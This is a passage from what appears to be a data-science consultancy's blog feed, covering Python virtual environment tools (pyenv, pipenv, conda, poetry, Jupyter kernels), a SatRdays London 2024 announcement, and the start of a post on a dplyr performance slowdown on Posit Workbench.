&lt;img src="barbie_python_version.png" alt="A sketch of a pink house with three dressed up Python logos at the windows with different Python version numbers underneath each." style="width: 400px; display: block; margin-left: auto; margin-right: auto"/&gt;
&lt;p&gt;As well as different outfits and accessories for Barbie, there are different iterations of Barbie herself: Marine Biologist Barbie and Art Teacher Barbie to name a few! Python also comes in different versions, and there are many occasions where having multiple Python installations on the same machine can be useful:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;You may have upgraded to Python 3.11 but still need Python 3.8 to run some old legacy code.&lt;/li&gt;
&lt;li&gt;Your colleagues may be using an older version of Python for a project that you&amp;rsquo;re working on, and switching to that version to test and debug the project code would be useful.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Pyenv is a tool that allows you to easily switch between multiple Python versions on your system. It also facilitates installing different Python versions and, through the pyenv-virtualenv plugin, supports creating virtual environments for specific Python versions.&lt;/p&gt;
&lt;p&gt;The &lt;a href="https://github.com/pyenv/pyenv#installation" rel="external"&gt;GitHub documentation&lt;/a&gt; provides OS-specific instructions for installing pyenv on your machine. Once installed, you can try adding an older Python version using the &lt;code&gt;pyenv install&lt;/code&gt; command and then create a virtual environment for that version called &amp;ldquo;myenv/&amp;rdquo;:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;pyenv install 3.8.6
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;pyenv virtualenv 3.8.6 myenv
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;You can activate the environment by running:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;pyenv activate myenv
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;and install packages into the environment using pip.&lt;/p&gt;
&lt;p&gt;This is a great way to organise Python projects that not only require different packages but also use specific Python releases. And there is a lot more that you can do with pyenv, like specifying the Python version globally or in the current directory. Note, however, that there are some common pitfalls to be wary of when using pyenv:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;It&amp;rsquo;s easy to think that you&amp;rsquo;re using your system Python installation when really you&amp;rsquo;re working with an older version through pyenv.&lt;/li&gt;
&lt;li&gt;Be cautious when working with package managers like pip and poetry, which may be installing packages to your system Python installation rather than to the current pyenv version.&lt;/li&gt;
&lt;/ul&gt;
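&lt;p&gt;One way to guard against both pitfalls is to ask the interpreter directly which Python is running. The snippet below is a minimal sketch using only the standard library; the function name &lt;code&gt;describe_interpreter&lt;/code&gt; is a made-up helper, not part of pyenv.&lt;/p&gt;

```python
import platform
import sys


def describe_interpreter():
    """Collect details about the Python interpreter that is actually running."""
    return {
        # Full path of the Python binary executing this script.
        "executable": sys.executable,
        # Release number, for example "3.8.6".
        "version": platform.python_version(),
        # Inside a virtual environment sys.prefix points at the environment,
        # while sys.base_prefix still points at the underlying installation.
        "in_virtual_env": sys.prefix != sys.base_prefix,
    }


info = describe_interpreter()
for key, value in info.items():
    print(f"{key}: {value}")
```

&lt;p&gt;If the reported path or version is not the one you expected, the wrong interpreter is active. Calling pip as &lt;code&gt;python -m pip install&lt;/code&gt; ties the installation to that same interpreter.&lt;/p&gt;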
&lt;p&gt;We recommend checking out the &lt;a href="https://github.com/pyenv/pyenv" rel="external"&gt;pyenv documentation&lt;/a&gt; and this &lt;a href="https://towardsdatascience.com/managing-virtual-environment-with-pyenv-ae6f3fb835f8" rel="external"&gt;useful blog post&lt;/a&gt; for more information.&lt;/p&gt;
&lt;h3 id="pipenv"&gt;Pipenv&lt;/h3&gt;
&lt;p&gt;Pipenv is a popular tool for managing both Python dependencies and virtual environments. It combines the functionality of pip and virtualenv into a single tool, and is easy to install through pip:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;pip install pipenv
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;It even integrates with pyenv to work with specific Python versions. To create a virtual environment for Python 3.8 (assuming you have pyenv installed), you can run:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;pipenv --python 3.8
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;This automatically sets up a &amp;ldquo;Pipfile&amp;rdquo; within the current folder to manage project dependencies. You can then activate the environment and install packages into the environment using &lt;code&gt;pipenv&lt;/code&gt; commands:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;pipenv shell
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;pipenv install &amp;lt;pkg&amp;gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;When a package is installed using pipenv, it gets added to the Pipfile. Both the package and its dependencies are also stored in a &amp;ldquo;Pipfile.lock&amp;rdquo; file with the exact version numbers. These files can be shared with a colleague, who can then duplicate the environment on their machine by running &lt;code&gt;pipenv install&lt;/code&gt;.&lt;/p&gt;
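&lt;p&gt;Because Pipfile.lock is a JSON file, it can be inspected with a few lines of Python. The sketch below is illustrative only: the lock content is a hypothetical, heavily trimmed sample (a real file also records hashes and other metadata), and &lt;code&gt;pinned_versions&lt;/code&gt; is a helper name we made up for this example.&lt;/p&gt;

```python
import json

# Hypothetical, heavily trimmed Pipfile.lock content for illustration only
SAMPLE_LOCK = """
{
    "_meta": {"requires": {"python_version": "3.8"}},
    "default": {
        "numpy": {"version": "==1.24.4"},
        "pandas": {"version": "==2.0.3"}
    },
    "develop": {
        "pytest": {"version": "==7.4.0"}
    }
}
"""


def pinned_versions(lock_text, section="default"):
    """Map each package in one section of a Pipfile.lock to its pinned version."""
    lock = json.loads(lock_text)
    return {
        # Some entries (for example editable installs) may carry no version key
        name: details.get("version", "unpinned")
        for name, details in lock.get(section, {}).items()
    }


if __name__ == "__main__":
    for name, version in sorted(pinned_versions(SAMPLE_LOCK).items()):
        print(f"{name}{version}")
```

&lt;p&gt;To try this on a real project, you could read the text of your own Pipfile.lock and pass it to the function in place of the sample string.&lt;/p&gt;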
&lt;p&gt;For more information about pipenv, Pipfiles and all of pipenv&amp;rsquo;s commands you can take a look at the &lt;a href="https://pipenv.pypa.io/en/latest/" rel="external"&gt;official website&lt;/a&gt;.&lt;/p&gt;
&lt;h3 id="conda"&gt;conda&lt;/h3&gt;
&lt;p&gt;Conda is a cross-platform package and environment manager primarily used in data science and scientific computing. It allows you to create isolated environments with different Python versions and libraries.&lt;/p&gt;
&lt;p&gt;Conda is included as part of the &lt;a href="https://anaconda.org/" rel="external"&gt;Anaconda&lt;/a&gt; distribution. The fastest way to obtain it is by installing the Miniconda distribution, which acts as a smaller version of Anaconda that includes conda and Python. You can check out the installation instructions in our &lt;a href="https://www.jumpingrivers.com/blog/python-package-managers-pip-conda-poetry/" rel="external"&gt;previous blog&lt;/a&gt; for more info.&lt;/p&gt;
&lt;p&gt;By default, you will be working in the conda &amp;ldquo;base&amp;rdquo; environment. To create a new environment called &amp;ldquo;myenv&amp;rdquo; with Python version 3.8:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;conda create --name myenv &lt;span style="color:#79c0ff"&gt;python&lt;/span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;3.8
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;You can then activate the environment by running:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;conda activate myenv
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;and deactivate the environment by running:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;conda deactivate
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;To install packages into the currently-active environment, you should use the &lt;code&gt;conda install&lt;/code&gt; command. For example, NumPy and Pandas can be installed by running:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;conda install numpy pandas
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;When you install packages into a conda environment, the package source files are retained inside a package cache folder within the conda installation directory. This allows you to quickly install the same package across multiple environments without having to perform multiple downloads.&lt;/p&gt;
&lt;p&gt;It&amp;rsquo;s possible to export your conda environment to a YAML file which can then be shared with a colleague:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;conda env export &amp;gt; environment.yml
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Your colleague can add the environment to their machine by running:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;conda env create -f environment.yml
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;For this to work, both you and your colleague need to have conda installed. Conda can also be used for R and other languages, and downloads its packages from secure repositories that are maintained by the community. For more on conda, check out the &lt;a href="https://docs.conda.io/projects/conda/en/stable/" rel="external"&gt;official documentation&lt;/a&gt;.&lt;/p&gt;
&lt;h3 id="poetry"&gt;Poetry&lt;/h3&gt;
&lt;p&gt;Poetry is a modern dependency management and packaging tool for Python projects. It not only creates virtual environments but also simplifies the management of dependencies and project packaging.&lt;/p&gt;
&lt;p&gt;Check out our &lt;a href="https://www.jumpingrivers.com/blog/python-package-managers-pip-conda-poetry/" rel="external"&gt;previous blog&lt;/a&gt; for installation instructions. To create a new poetry project, run:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;poetry new myproject
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;This initialises a project in the &amp;ldquo;myproject/&amp;rdquo; folder and automatically sets up a virtual environment for it. To add a package you can run:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;poetry add &amp;lt;pkg&amp;gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;To activate the virtual environment, run the following command from within the myproject/ folder:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;poetry shell
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;When you install packages these are added to a &amp;ldquo;pyproject.toml&amp;rdquo; file. There is also a &amp;ldquo;poetry.lock&amp;rdquo; file which lists all dependencies plus all of &lt;em&gt;their&lt;/em&gt; dependencies with the exact versions. By sharing the project folder and files with a colleague, they can run &lt;code&gt;poetry install&lt;/code&gt; within the folder to duplicate the environment on their machine.&lt;/p&gt;
&lt;p&gt;We highly recommend poetry if you&amp;rsquo;re starting on a new Python project from scratch. It helps with not only the environment management, but also installing the project dependencies and organising the project folder. It can even be used to package your project and publish it to the &lt;a href="https://pypi.org/" rel="external"&gt;Python Package Index (PyPI)&lt;/a&gt; if you want to make it publicly-available. Check out the excellent &lt;a href="https://python-poetry.org/docs/" rel="external"&gt;documentation&lt;/a&gt; for more info.&lt;/p&gt;
&lt;h2 id="virtual-environments-with-jupyter"&gt;Virtual environments with Jupyter&lt;/h2&gt;
&lt;p&gt;Hopefully we&amp;rsquo;ve convinced you that virtual environments are as invaluable to Python development as Barbie&amp;rsquo;s wardrobe is to Barbie! You may now be thinking about how to incorporate some of the options presented in this blog into your development workflow.&lt;/p&gt;
&lt;img src="jupyter.png" alt="The Jupyter logo surrounded by three Python logos, each dressed up in a different outfit." style="width: 600px; display: block; margin-left: auto; margin-right: auto"/&gt;
&lt;p&gt;Before we conclude, it&amp;rsquo;s worth mentioning how to add a virtual environment to Jupyter, since this is one of the most popular IDEs for developing and testing Python code. To be able to use your virtual environments within a Jupyter notebook or the JupyterLab IDE you need to:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;
&lt;p&gt;Activate your virtual environment&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;Install the Python package &lt;code&gt;ipykernel&lt;/code&gt; into your virtual environment using the relevant command:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;code&gt;pip install ipykernel&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;conda install ipykernel&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;etc&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;Then run&lt;/p&gt;
&lt;p&gt;&lt;code&gt;python -m ipykernel install --user --name=&amp;lt;env&amp;gt;&lt;/code&gt;&lt;/p&gt;
&lt;p&gt;replacing &lt;code&gt;&amp;lt;env&amp;gt;&lt;/code&gt; with the name of your virtual environment.&lt;/p&gt;
&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;Next time you open a Jupyter notebook or JupyterLab, you should see your environment in the list of available kernels.&lt;/p&gt;
&lt;h2 id="conclusion"&gt;Conclusion&lt;/h2&gt;
&lt;p&gt;Choosing the right virtual environment manager for your Python project depends on your specific requirements and preferences. Each of the tools discussed in this post has its own strengths and use cases as summarised by the table below:&lt;/p&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th style="text-align: left"&gt;Environment manager&lt;/th&gt;
&lt;th style="text-align: center"&gt;Quick/easy installation&lt;/th&gt;
&lt;th style="text-align: center"&gt;Package manager&lt;/th&gt;
&lt;th style="text-align: center"&gt;Quick multi-environment switching&lt;/th&gt;
&lt;th style="text-align: center"&gt;Python version manager&lt;/th&gt;
&lt;th style="text-align: center"&gt;Multi-language support&lt;/th&gt;
&lt;th style="text-align: center"&gt;Packaging and publishing to PyPI&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td style="text-align: left"&gt;venv&lt;/td&gt;
&lt;td style="text-align: center"&gt;✅&lt;/td&gt;
&lt;td style="text-align: center"&gt;❌&lt;/td&gt;
&lt;td style="text-align: center"&gt;❌&lt;/td&gt;
&lt;td style="text-align: center"&gt;❌&lt;/td&gt;
&lt;td style="text-align: center"&gt;❌&lt;/td&gt;
&lt;td style="text-align: center"&gt;❌&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="text-align: left"&gt;virtualenv&lt;/td&gt;
&lt;td style="text-align: center"&gt;✅&lt;/td&gt;
&lt;td style="text-align: center"&gt;❌&lt;/td&gt;
&lt;td style="text-align: center"&gt;✅&lt;/td&gt;
&lt;td style="text-align: center"&gt;❌&lt;/td&gt;
&lt;td style="text-align: center"&gt;❌&lt;/td&gt;
&lt;td style="text-align: center"&gt;❌&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="text-align: left"&gt;pyenv&lt;/td&gt;
&lt;td style="text-align: center"&gt;❌&lt;/td&gt;
&lt;td style="text-align: center"&gt;❌&lt;/td&gt;
&lt;td style="text-align: center"&gt;✅&lt;/td&gt;
&lt;td style="text-align: center"&gt;✅&lt;/td&gt;
&lt;td style="text-align: center"&gt;❌&lt;/td&gt;
&lt;td style="text-align: center"&gt;❌&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="text-align: left"&gt;pipenv&lt;/td&gt;
&lt;td style="text-align: center"&gt;✅&lt;/td&gt;
&lt;td style="text-align: center"&gt;✅&lt;/td&gt;
&lt;td style="text-align: center"&gt;❌&lt;/td&gt;
&lt;td style="text-align: center"&gt;✅&lt;/td&gt;
&lt;td style="text-align: center"&gt;❌&lt;/td&gt;
&lt;td style="text-align: center"&gt;❌&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="text-align: left"&gt;conda&lt;/td&gt;
&lt;td style="text-align: center"&gt;❌&lt;/td&gt;
&lt;td style="text-align: center"&gt;✅&lt;/td&gt;
&lt;td style="text-align: center"&gt;✅&lt;/td&gt;
&lt;td style="text-align: center"&gt;✅&lt;/td&gt;
&lt;td style="text-align: center"&gt;✅&lt;/td&gt;
&lt;td style="text-align: center"&gt;❌*&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="text-align: left"&gt;poetry&lt;/td&gt;
&lt;td style="text-align: center"&gt;❌&lt;/td&gt;
&lt;td style="text-align: center"&gt;✅&lt;/td&gt;
&lt;td style="text-align: center"&gt;✅&lt;/td&gt;
&lt;td style="text-align: center"&gt;✅&lt;/td&gt;
&lt;td style="text-align: center"&gt;❌&lt;/td&gt;
&lt;td style="text-align: center"&gt;✅&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;
&lt;div style="text-align: right"&gt; * publishes to conda channels &lt;/div&gt;
&lt;p&gt;Ultimately, the key is to ensure that your Python projects remain isolated, maintainable, and compatible with the required dependencies. Experiment with these tools and discover which one best fits your development workflow.&lt;/p&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/python-virtual-environments-conda-poetry/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>SatRdays London 2024</title><link>https://www.jumpingrivers.com/blog/satrdays-london-2024-r-conference/</link><pubDate>Tue, 14 Nov 2023 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/satrdays-london-2024-r-conference/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/satrdays-london-2024-r-conference/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/satrdays-london-2024-r-conference/featured.png " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;&lt;a href="https://satrday-london-2024.jumpingrivers.com/" rel="external"&gt;SatRdays&lt;/a&gt; is returning to London on 27th April 2024! We&amp;rsquo;re collaborating once again with &lt;a href="https://cusplondon.ac.uk/" rel="external"&gt;CUSP London&lt;/a&gt; to bring SatRdays to the amazing &lt;a href="https://en.wikipedia.org/wiki/Bush_House" rel="external"&gt;Bush House&lt;/a&gt; venue, and we can&amp;rsquo;t wait to see you there. More information will be released in the coming weeks - in the meantime, check out &lt;a href="https://youtube.com/playlist?list=PLbARZQfpqIKLNjt5NnVQ1RgEKeayVVv6G&amp;amp;si=tCFY7hjvwdnC89T1" rel="external"&gt;the recordings of last year&amp;rsquo;s talks&lt;/a&gt; for an idea of what to expect!&lt;/p&gt;
&lt;h3 id="call-for-abstracts-now-open"&gt;Call for abstracts NOW OPEN&lt;/h3&gt;
&lt;p&gt;Interested in getting involved? We&amp;rsquo;re looking to feature talks from R users from a wide range of industries, public services and academia! To apply to be a speaker, please submit your abstract (max 250 words) using &lt;a href="https://jumpingrivers.typeform.com/to/mQ756zLT" rel="external"&gt;this form&lt;/a&gt; by 17th January 2024.&lt;/p&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/satrdays-london-2024-r-conference/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>Sluggish system or client code?</title><link>https://www.jumpingrivers.com/blog/dplyr-debugging-posit-diffify/</link><pubDate>Thu, 02 Nov 2023 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/dplyr-debugging-posit-diffify/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/dplyr-debugging-posit-diffify/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/dplyr-debugging-posit-diffify/featured.png " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;Over the course of several weeks, we worked to deploy a one-stop data science platform for data analysis and visualisation for one of our clients. This platform consisted of interconnected applications, which are the motor that enables the productivity of the data scientists sitting at the wheel.&lt;/p&gt;
&lt;p&gt;The components of the platform were:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;em&gt;GitLab&lt;/em&gt;: where data scientists can develop and share their code using all the benefits of Git version control.&lt;/li&gt;
&lt;li&gt;&lt;em&gt;Posit Workbench&lt;/em&gt;: which hosts development environments such as RStudio on beefy servers, with far more computational power compared to IDEs on local machines.&lt;/li&gt;
&lt;li&gt;&lt;em&gt;Posit Connect&lt;/em&gt;: which allows data scientists to easily share data, dashboards and reports. It supports sharing documents, reports and interactive web applications, as well as hosting Application Programming Interfaces (APIs).&lt;/li&gt;
&lt;li&gt;&lt;em&gt;Posit Package Manager&lt;/em&gt;: which allows for the organisation, centralisation and distribution of code packages. It provides a mirror of R and Python packages, downloaded from external sources such as CRAN (the Comprehensive R Archive Network). It also provides a way for internally-developed R and Python packages to be shared, if the client wishes.&lt;/li&gt;
&lt;/ul&gt;
&lt;aside class="advert"&gt;
&lt;p&gt;
Do you use Professional Posit Products? If so, check out our &lt;a href="https://www.jumpingrivers.com/consultancy/managed-rstudio-rsconnect-cloud-production/?utm_source=blog&amp;amp;utm_medium=banner&amp;amp;utm_campaign=2023-dplyr-debugging-posit-diffify"&gt;managed Posit&lt;/a&gt; services
&lt;/p&gt;
&lt;/aside&gt;
&lt;h3 id="our-deployment-philosophy"&gt;Our deployment philosophy&lt;/h3&gt;
&lt;p&gt;When we deploy these components together, we do so in such a way that they enhance each other&amp;rsquo;s functionality; the whole is greater than the sum of its parts. For instance, we:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Allow users to use the same authentication across all of these applications.&lt;/li&gt;
&lt;li&gt;Ensure that users are able to publish documents from Workbench to Connect out-of-the-box. Users don&amp;rsquo;t have to worry about specifying the correct URLs or ports for all of this to work.&lt;/li&gt;
&lt;li&gt;Ensure that users in Workbench can access any package they need (developed internally, or from popular external package repositories such as CRAN) via Package Manager, without any extra configurations required.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Having all of these set up out-of-the-box means users can get straight to exploring the many ways in which Posit can increase productivity, without spending time on configuration.&lt;/p&gt;
&lt;p&gt;We also carry out disaster recovery, ensuring that in the event of the unexpected (server failure or data corruption, for example), we can recover all data from a backup.&lt;/p&gt;
&lt;p&gt;Finally, we carry out security hardening. Each component in our system is checked to ensure it operates to appropriate security standards. This means our infrastructure is secured to UK Government (National Cyber Security Centre) standards, and certified by CREST-accredited cloud security professionals.&lt;/p&gt;
&lt;h3 id="workbench-system-performance"&gt;Workbench system performance&lt;/h3&gt;
&lt;p&gt;One of the key selling points of doing computations on a cloud-hosted server &amp;ndash; as opposed to a data scientist&amp;rsquo;s laptop &amp;ndash; is that it&amp;rsquo;s possible to access very powerful machines in the cloud. This improves the speed at which data scientists&amp;rsquo; code gets executed, meaning quicker iterations on analysis. When commands take longer than a few seconds, the delay can &lt;a href="https://www.nngroup.com/articles/response-times-3-important-limits/" rel="external"&gt;distract from&lt;/a&gt; analysts’ train of thought.&lt;/p&gt;
&lt;p&gt;If users perceive that the system provided to them is less-than-performant, &lt;a href="https://www.jumpingrivers.com/blog/improving-responsiveness-shiny-applications/" rel="external"&gt;they may not use it&lt;/a&gt;. It is important that we demonstrate to our users that the platform we provide has excellent performance.&lt;/p&gt;
&lt;h3 id="fast-feedback"&gt;Fast Feedback&lt;/h3&gt;
&lt;p&gt;Now, back to the client project. We had nearly finished the project, and had given the client a testing environment. Out of the blue, we received this message:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;Hi all, is there any reason why rowwise() is performing particularly slow in Workbench?&lt;/p&gt;
&lt;p&gt;Time on Workbench: 5.3 minutes&lt;/p&gt;
&lt;p&gt;Time to execute example code on client&amp;rsquo;s laptop: 8 seconds&lt;/p&gt;
&lt;/blockquote&gt;
&lt;h3 id="oh-no"&gt;Oh no!&lt;/h3&gt;
&lt;p&gt;We were shocked. We pride ourselves on providing applications that are useful to our data scientist users. It seemed that &amp;ndash; even though the CPUs in our cloud instance are far more powerful than those in a typical laptop &amp;ndash; our system was the less performant. Clearly there must be some configuration wrong &amp;ndash; something we can change to put things right!&lt;/p&gt;
&lt;h3 id="what-we-tried-first"&gt;What we tried first&lt;/h3&gt;
&lt;p&gt;We tried everything we could think of to trace the root cause of the problem. We tried evaluating the code on our laptops. We tried other Workbench servers.&lt;/p&gt;
&lt;p&gt;&amp;hellip; Both showed that running on Workbench on powerful machines was much slower than on laptops. We tested across many Workbench servers and against laptops! It perplexed us!&lt;/p&gt;
&lt;h3 id="ok-what-next"&gt;Ok, what next?&lt;/h3&gt;
&lt;p&gt;There were a few more places that we could look:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;The specifications of the CPUs involved on our servers, compared to our laptops, to see if it would explain the slowdown. It did not.&lt;/li&gt;
&lt;li&gt;Trying in R sessions outside of Workbench, to see if somehow it was a slowdown related to the RStudio Workbench application. It was not.&lt;/li&gt;
&lt;/ul&gt;
&lt;h3 id="r-packages"&gt;R packages&lt;/h3&gt;
&lt;p&gt;One thing left to try: was the version of the R package in question, &lt;a href="https://dplyr.tidyverse.org/" rel="external"&gt;&lt;code&gt;{dplyr}&lt;/code&gt;&lt;/a&gt;, the same on all machines?&lt;/p&gt;
&lt;p&gt;The Workbench servers we provided had newer versions of that package past v1.1.0, while on all of our laptops, we had older versions cached. This may have been because we had just set up the server and users were just getting started with using it and installing the packages they needed, so they would tend to have the later versions of packages installed. On their laptops, they may have installed &lt;code&gt;{dplyr}&lt;/code&gt; or &lt;code&gt;{tidyverse}&lt;/code&gt; some time ago.&lt;/p&gt;
&lt;p&gt;By downgrading the version of &lt;code&gt;{dplyr}&lt;/code&gt;, it turned out we were able to execute the given reproducible example in 3 seconds &amp;ndash; faster than the client&amp;rsquo;s existing solution!&lt;/p&gt;
&lt;h3 id="obvious-solution-downgrade-check-diffify-first"&gt;Obvious solution: downgrade? Check Diffify first&lt;/h3&gt;
&lt;p&gt;You may think that the obvious solution would be to encourage the client to downgrade the version of &lt;code&gt;{dplyr}&lt;/code&gt; that they use in production to one before v1.1.0, which would be much faster in using &lt;code&gt;dplyr::rowwise()&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;However, we had one last thing to check: what features would be lost if we did this? There could be improvements in the later versions that we would lose by downgrading. Would this break existing code?&lt;/p&gt;
&lt;p&gt;Enter &lt;a href="https://diffify.com/R/dplyr/1.0.10/1.1.0" rel="external"&gt;Diffify&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;Diffify provides a comparison between different versions of R packages stored on &lt;a href="https://cran.r-project.org/" rel="external"&gt;CRAN&lt;/a&gt; or Python packages stored on &lt;a href="https://pypi.org/" rel="external"&gt;PyPI&lt;/a&gt;. It allows users to select the versions of packages that they want to compare, and presents the differences in a human readable way, making it easy to pick out anything relevant quickly.&lt;/p&gt;
&lt;p&gt;It does this by looking at things such as:&lt;/p&gt;
&lt;ul&gt;
